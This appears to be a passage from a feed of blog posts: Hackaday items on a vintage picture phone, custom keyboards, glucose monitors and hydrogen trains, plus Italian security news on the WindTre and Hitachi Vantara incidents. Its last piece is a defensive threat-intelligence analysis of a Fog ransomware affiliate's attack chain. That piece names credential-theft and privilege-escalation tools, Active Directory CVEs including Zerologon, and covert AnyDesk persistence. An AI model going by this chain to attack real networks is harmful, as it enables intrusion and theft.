Alignment shouldn’t have been too hard. The highest tone on the phone line was 2,300 Hz. While there are many SSTV standards today for color images, this old-fashioned scheme was simple: 2,300 Hz for white and 1,500 Hz for black. A 1,200 Hz tone provided sync signals. Interestingly, sharp jumps in color could create artifacts, so the converters use a gray code to minimize unnecessary sharp jumps in value.

The Phone Book

It wouldn’t make sense to make only one of these, so we wonder how many pairs were built. The magazine did ask people to report if they had one and intended to publish a picture phone directory. We don’t know if that ever happened, but given what a long-distance phone call cost in 1982, we imagine that idea didn’t catch on.

The video phone was long a dream, and we still don’t have exactly what people imagined. We would really like to replicate this picture phone on a PC using GNU Radio, for example.

hackaday.com/2025/04/29/the-di…

Don’t you love it when the title track is the first one on the album? I had to single out this adjustable keyboard called the Protractor, because look at it! The whole thing moves, you know. Go look at the gallery.

Image by [BFB_Workshop] via redditIf you use a true split, even if you never leave the house, you know the pain of losing the good angle and/or separation you had going on for whatever reason. Not only does this monoblock split solve that simply by being a monoblock split, you can always find the right angle you had via the built-in angle finder.

[BFB_Workshop] used a nice!nano v2, but you could use any ZMK-supported board with the same dimensions. This 5 x 12 has 60 Gateron KS-33 switches, which it was made for, and has custom keycaps. You can, of course, see all the nice, neat ribbon cable wiring through the clear PLA, which is a really great touch.

This bad boy is flat enough that you can use the table as your palm rest. To me, that doesn’t sound so comfortable, but then again, I like key wells and such. I’d still love to try a Protractor, because it looks quite interesting to type on. If you want to build one, the files and instructions are available on Printables.

Present Arms: the AR-60%

Image by [Sli22ard] via redditYes I stole that joke, sort of. Don’t shoot! Anyway, as [Sli22ard] asks, does your keyboard have a mil-spec stock? I’m guessing no, although you might have a knife nearby. I myself have a fancy-handled butter knife for opening mail.

This is [Sli22ard]’s latest “abomination”, and the best part is that the MOE fixed carbine stock folds up so that the whole thing fits on the ever-important keyboard display. (Click to the second picture and be sure to admire the Dreamcast that was in storage for however long.)

The case is a Keysme Pic60, custom Cerakoted, with a 4pplet waffling60 PCB within its walls. That case is meant to have things hanging off the upper left corner, so that must have been a great place to start as far as connecting up the stock.

[Sli22ard] used Gateron Type R switches and a NovelKeys Cream Arc switch for the Spacebar. Most of the keycaps are GMK Striker, with the 10u Spacebar from Awekeys.

I particularly like the midnight-y keycaps along with that monster gold Spacebar. [Sli22ard] says it thocks like nobody’s business, and I believe it.

The Centerfold: the Quiet Type

Image by [Pleasant_Dot_189] via reddit[Pleasant_Dot_189] sure has a pleasant research-only battlestation, don’t they? Sure, there are four screens, but there’s no RGB, and the only plant can safely be ignored for weeks at a time. Why four screens? This way, [Pleasant_Dot_189] doesn’t have to switch between tasks or tabs and can just write as they work on their fifth book.

Do you rock a sweet set of peripherals on a screamin’ desk pad? Send me a picture along with your handle and all the gory details, and you could be featured here!

Historical Clackers: the Malling-Hansen Takygraf

The astute among you will remember that we’ve covered the Malling-Hansen Writing Ball, the more well-known offering from M-H. Well, this here is the Malling-Hansen Takygraf (or Takygraph, depending upon where you are in the world), and it was quite the writing machine. Only one was created, and its whereabouts are unknown.
Image via The Malling-Hansen Society
Rasmus Malling-Hansen’s intention was to create a typewriter that could type at the speed of human speech. And he succeeded — the Takygraf could reach speeds of 1200 characters per minute. He hoped the Takygraf would be used for stenography.

The VP of the Malling-Hansen Society describes the function of the Takygraf as follows: “The first Takygraf from 1872 was combined with a writing ball but the bottom of each piston forms a blunt point and so it forms only impressions in the paper. The paper band was prepared to conduct electricity. Under the paper band there were metal points which were connected to electromagnets. The form impressions in the paper band are brought in contact with the fixed metal points under the paper as the paper moves along and so the corresponding electromagnets are brought into action. When the electromagnets attracted the keepers, then the types made their impressions on the paper band (through the invention of a colored or carbonized strip of paper).

In the year 1874 follows a modified Takygraf combined with a writing ball but instead of the prepared paper (to conduct electricity) and the form impressions in the paper Rasmus Malling-Hansen developed a mechanical memory-unit, which contacts the electromagnets in the right time to make the needed type impressions on the paper band. It was possible to write with this brilliant invention as fast as we talk.”

Be sure to visit this fantastic model viewer of the Takygraph on your way out.

Finally, a Keyboard for Metalheads

Actually, the Cleaver is another aluminium keyboard, not the Icebreaker from a couple Keebins ago. But they’re from the same company, and the idea is basically the same. Aluminium wherever possible, and tiny, laser-cut holes that make up the legends. At least these are more legible.
Image by Serene Industries via Yanko Design
And, whereas the Icebreaker definitely doubled as bludgeoning device, the Cleaver is much slimmer and more streamlined. Both are machined from a single block of aluminium.

Much like its predecessor, the Cleaver is a Hall-effect keyboard, which I would really like to type on someday while I consider how they can never really wear out in the traditional switch sense.

Inside the metal block, the electronics are huddled away from its raw power inside of a silicone core. This is meant to enhance the typing acoustics, protect against dust, sweat, and coffee, and has the added effect of popping out the underside to be a nice, non-slip foot.

Unlike the Icebreaker, which started at $2100, the pre-order price for the Cleaver is a mere $850. And to get this one in black? Still just $850. I’m curious to know how much it weighs, since it’s much more portable-looking. The Cleaver would be an icebreaker for sure.

Got a hot tip that has like, anything to do with keyboards? Help me out by sending in a link or two. Don’t want all the Hackaday scribes to see it? Feel free to email me directly.

hackaday.com/2025/04/29/keebin…

Continuous glucose meters (CGMs) aren’t just widgets for the wellness crowd. For many, CGMs are real-time feedback machines for the body, offering glucose trendlines that help people rethink how they eat. They allow diabetics to continue their daily life without stabbing their fingertips several times a day, in the most inconvenient places. This video by [Becky Stern] is all about comparing two of the most popular continuous glucose monitors (CGMs): the Abbott Libre 3 and the Dexcom G7.

Both the Libre 3 and the G7 come with spring-loaded applicators and stick to the upper arm. At first glance they seem similar, but the differences run deep. The Libre 3 is the minimalist of both: two plastic discs sandwiching the electronics. The G7, in contrast, features an over-molded shell that suggests a higher production cost, and perhaps, greater robustness. The G7 needs a button push to engage, which users describe as slightly clumsy compared to the Libre’s simpler poke-and-go design. The nuance: G7’s ten-day lifespan means more waste than the fourteen-day Libre, yet the former allows for longer submersion in water, if that’s your passion.

While these devices are primarily intended for people with diabetes, they’ve quietly been adopted by a growing tribe of biohackers and curious minds who are eager to explore their own metabolic quirks. In February, we featured a dissection of the Stelo CGM, cracking open its secrets layer by layer.

youtube.com/embed/6ZTcJdSd2Rk?…

hackaday.com/2025/04/29/peekin…

As transport infrastructure in Europe moves toward a zero-carbon future, there remain a number of railway lines which have not been electrified. The question of replacing their diesel traction with greener alternatives, and there are a few different options for a forward looking railway company to choose from. In Germany the Rhine-Main railway took delivery of a fleet of 27 Alstom hydrogen-powered multiple units for local passenger services, but as it turns out they have not been a success (German language, Google translation.). For anyone enthused as we are about alternative power, this bears some investigation.

It seems that this time the reliability of the units and the supply of spare parts was the issue, rather than the difficulty of fuel transport as seen in other failed hydrogen transport problems, but whatever the reason it seems we’re more often writing about hydrogen’s failures than its successes. We really want to believe in a hydrogen future in which ultra clean trains and busses zip around on hydrogen derived from wind power, but sadly that has never seemed so far away. Instead trains seem inevitably to be following cars, and more successful trials using battery units point the way towards their being the future.

We’re sure that more hydrogen transport projects will come and go before either the technological problems are overcome, or they fade away as impractical as the atmospheric railway. Meanwhile we’d suggest hydrogen transport as the example when making value judgements about technology.

hackaday.com/2025/04/29/hydrog…

Il 25 febbraio 2025 WindTre ha rilevato un accesso non autorizzato ai sistemi informatici utilizzati dai propri rivenditori.

L’intrusione, riconosciuta come un’azione malevola, è stata fortunatamente circoscritta a un singolo punto vendita. L’azienda, in linea con la normativa vigente, ha immediatamente informato le autorità competenti e ha proceduto a mettere in sicurezza il sistema compromesso.

Le indagini interne condotte da WindTre hanno permesso di stabilire che l’incidente ha comportato la visualizzazione e, in alcuni casi, la possibile esfiltrazione di dati personali comuni. Tra le informazioni potenzialmente compromesse si annoverano dati anagrafici quali nome, cognome, indirizzo e recapiti. L’azienda ha precisato che, anche se l’evento è stato contenuto, non si può escludere che anche i dati di alcuni clienti siano stati coinvolti.

A fronte dell’accaduto, WindTre ha ribadito il proprio impegno nella protezione dei dati personali, dichiarando di aver immediatamente adottato misure aggiuntive per prevenire il ripetersi di episodi simili. Tra queste, l’introduzione di tecnologie più avanzate per la sicurezza informatica.

L’azienda invita i propri clienti a mantenere alta l’attenzione rispetto a comunicazioni sospette ricevute via telefono, SMS, email o WhatsApp. Viene inoltre raccomandato di monitorare eventuali profili falsi sui social network. Un altro suggerimento utile riguarda la creazione di password “forti”, che seguano criteri minimi di complessità.

WindTre ha messo a disposizione diversi canali di assistenza per fornire supporto ai clienti potenzialmente coinvolti. È possibile contattare il servizio clienti al numero 159, scrivere al Data Protection Officer all’indirizzo dedicato (dataprotectionofficer@windtre.it) oppure chiamare il numero verde 800591854, attivo tutti i giorni dalle 10:00 alle 19:00, per ricevere chiarimenti o segnalare eventuali anomalie.

La comunicazione rientra nelle disposizioni previste dall’articolo 34 del Regolamento Europeo sulla protezione dei dati personali (GDPR), che obbliga i titolari del trattamento a informare tempestivamente gli interessati in caso di violazioni che possano comportare un rischio elevato per i loro diritti e le loro libertà.

L'articolo WindTre comunica un DataBreach che ha coinvolto i sistemi dei rivenditori proviene da il blog della sicurezza informatica.

Hitachi Vantara, una sussidiaria della multinazionale giapponese Hitachi, è stata costretta a disattivare i propri server durante il fine settimana per contenere l’attacco ransomware Akira.

Hitachi Vantara fornisce servizi di archiviazione dati, sistemi infrastrutturali, gestione del cloud computing e ripristino da ransomware. Collabora con agenzie governative e con i più grandi marchi del mondo, tra cui BMW, Telefónica, T-Mobile e China Telecom.

Secondo Bleeping Computer, Hitachi Vantara ha riconosciuto di aver subito un attacco ransomware e ha affermato di aver incaricato esperti di sicurezza informatica esterni di indagare sull’incidente e di essere al lavoro per ripristinare la funzionalità di tutti i sistemi interessati.

“Il 26 aprile 2025, Hitachi Vantara è stata vittima di un attacco ransomware che ha causato l’interruzione di alcuni dei nostri sistemi”, ha affermato Hitachi Vantara. — Dopo aver rilevato attività sospette, abbiamo immediatamente attivato protocolli di risposta agli incidenti e coinvolto esperti terzi in materia per condurre un’indagine e attenuare le conseguenze. Inoltre, per contenere l’incidente, abbiamo preventivamente disattivato i nostri server.”

Sebbene l’azienda non abbia attribuito l’attacco a nessun gruppo di hacker specifico, i giornalisti hanno riferito che dietro l’attacco c’è il gruppo Akira. La fonte stessa della pubblicazione, a conoscenza della situazione, ha riferito che gli hacker hanno rubato file dalla rete Hitachi Vantara e hanno lasciato richieste di riscatto sui computer hackerati.

È stato inoltre segnalato che, sebbene i servizi cloud dell’azienda non siano stati colpiti, i sistemi Hitachi Vantara e Hitachi Vantara Manufacturing sono stati disattivati ​​durante i lavori di localizzazione dell’attacco. Allo stesso tempo, i clienti con ambienti self-hosted possono accedere ai propri dati come di consueto.

Un’altra fonte ha riferito alla pubblicazione che l’attacco ha colpito una serie di progetti non specificati appartenenti a organizzazioni governative.

Il gruppo di hacker Akira è attivo da marzo 2023. Nel corso degli anni, il gruppo ha elencato oltre 300 organizzazioni sul suo sito di data dump e ha preso di mira numerose aziende e istituzioni di alto profilo, tra cui la Stanford University e Nissan (in Australia e Nuova Zelanda).

Secondo l’FBI, ad aprile 2024, Akira aveva compromesso più di 250 organizzazioni e riscosso più di 42 milioni di dollari in riscatti dalle sue vittime.

L'articolo Hitachi Vantara colpita da ransomware: i server spenti per fermare Akira proviene da il blog della sicurezza informatica.

Negli ultimi anni, abbiamo assistito all’evoluzione incessante delle minacce cyber, che da semplici attacchi opportunistici si sono trasformati in operazioni altamente strutturate, capaci di colpire bersagli eterogenei su scala globale. L’ultimo caso degno di nota è quello descritto nel report pubblicato da The DFIR Report, che ci guida alla scoperta di un’infrastruttura malevola associata a un affiliato del gruppo Fog Ransomware.

Questa analisi rivela non solo le tecniche offensive impiegate, ma anche l’intelligenza e la pianificazione dietro l’intera catena di attacco, che ha coinvolto numerosi strumenti noti nel mondo del red teaming e dell’ethical hacking, piegati però a scopi criminali.

Origine dell’attacco: accesso iniziale tramite VPN compromessa

Il punto di partenza dell’intera operazione è riconducibile a un classico, ma sempre efficace, vettore di accesso iniziale: l’utilizzo di credenziali compromesse per connettersi a una SonicWall VPN esposta pubblicamente. In questo caso, non si parla di exploit di vulnerabilità zero-day, ma dell’abuso di password deboli o già trafugate e circolanti nel dark web. Ancora una volta, si conferma quanto la gestione delle credenziali e l’assenza di autenticazione multifattoriale siano tra i principali talloni d’Achille delle infrastrutture aziendali.

L’arsenale offensivo: strumenti noti, orchestrazione letale

Il contenuto dell’open directory scoperta – rivelatosi un vero e proprio toolkit offensivo – ha permesso agli analisti di ricostruire con estrema precisione le varie fasi dell’attacco. Gli strumenti rinvenuti, pur essendo noti e disponibili in contesti di test o formazione, sono stati qui utilizzati con finalità del tutto malevole:

• SonicWall Scanner: per l’individuazione automatizzata di dispositivi VPN esposti e potenzialmente vulnerabili.
• Sliver C2: una piattaforma Command & Control alternativa a Cobalt Strike, capace di gestire payload e comunicazioni crittografate, oltre a offrire strumenti di evasione e pivoting avanzati.
• DonPAPI: strumento pensato per estrarre credenziali dal Windows DPAPI, spesso sottovalutato ma estremamente efficace per recuperare segreti utente da browser e altri software.
• Certipy: specializzato nello sfruttamento delle vulnerabilità certificate-based presenti in Active Directory, come attacchi relaying su servizi di autenticazione.
• Zer0dump, noPac e Pachine: impiegati per escalation dei privilegi, attacchi relaying NTLM e abuso delle deleghe Kerberos, in particolare tramite combinazioni che coinvolgono le vulnerabilità CVE-2021-42278 e CVE-2021-42287.

Un elemento particolarmente interessante è l’impiego di AnyDesk, utilizzato come meccanismo di persistenza. Il software è stato distribuito e installato silenziosamente tramite PowerShell script preconfigurati, con l’obiettivo di mantenere l’accesso ai sistemi anche in caso di reboot o revoca delle credenziali.

Tecniche MITRE ATT&CK in uso

Il grafo relazionale allegato al report e qui riportato fornisce una rappresentazione visiva straordinariamente dettagliata dei collegamenti tra attori, tecniche, vulnerabilità e settori colpiti. Le tecniche impiegate coprono diverse fasi della kill chain:

Le vulnerabilità sfruttate

Gli attaccanti si sono avvalsi di tre vulnerabilità note, ma ancora ampiamente presenti in molte realtà aziendali:

• CVE-2021-42287: consente ad un utente autenticato di impersonare un altro account, specialmente in combinazione con exploit AD.
• CVE-2021-42278: abusa dei record DNS e dei nomi computer per ottenere escalation privilegi.
• CVE-2020-1472 (Zerologon): uno degli exploit più devastanti degli ultimi anni, consente di ottenere il controllo completo di un domain controller sfruttando l’algoritmo di autenticazione Netlogon.

Queste vulnerabilità, sebbene pubbliche da tempo, rappresentano un pericolo persistente a causa della lentezza di alcune organizzazioni nell’applicare patch o mitigazioni strutturate.

Target colpiti: una minaccia globale e trasversale

Il gruppo Fog Ransomware si distingue per l’ampiezza geografica e settoriale dei suoi bersagli. Il grafo mostra chiaramente l’attività mirata contro:

• Nazioni coinvolte:
  
  • 🇺🇸 Stati Uniti d’America
  • 🇮🇹 Italia
  • 🇧🇷 Brasile
  • 🇬🇷 Grecia

  
  

• Settori economici colpiti:
  
  • 🛒 Retail
  • 🎓 Education
  • 🖥️ Technology
  • 🚚 Transportation

  
  

Questa distribuzione evidenzia una strategia non opportunistica ma pianificata, basata su analisi di impatto, disponibilità delle superfici di attacco e, probabilmente, capacità di pagamento del riscatto.

Considerazioni finali

Ci troviamo di fronte a un caso emblematico in cui l’integrazione di strumenti noti (alcuni persino open source), l’automazione di task offensivi tramite scripting e l’uso di vulnerabilità non zero-day danno vita a una campagna ransomware efficace e su larga scala.

La professionalizzazione del cybercrime e l’accessibilità degli strumenti di attacco rendono necessaria una nuova consapevolezza da parte delle aziende. Non si tratta solo di aggiornare i sistemi, ma di ripensare completamente la propria postura di sicurezza:

• Messa in sicurezza dei controller di dominio e delle infrastrutture Active Directory
• Monitoraggio continuo delle anomalie tramite strumenti EDR e SIEM
• Segmentazione delle reti interne
• Disabilitazione dei protocolli obsoleti (come Netlogon non sicuro)
• MFA ovunque, incluso VPN e accessi remoti

Il gruppo Fog Ransomware ci ricorda che, nel mondo delle minacce informatiche, l’unica nebbia ammissibile è quella che avvolge gli attaccanti nei nostri sistemi di deception. Ma noi, oggi più che mai, dobbiamo vedere chiaro.

L'articolo Navigare nella Nebbia: analisi tecnica dell’operazione del ransomware Fog proviene da il blog della sicurezza informatica.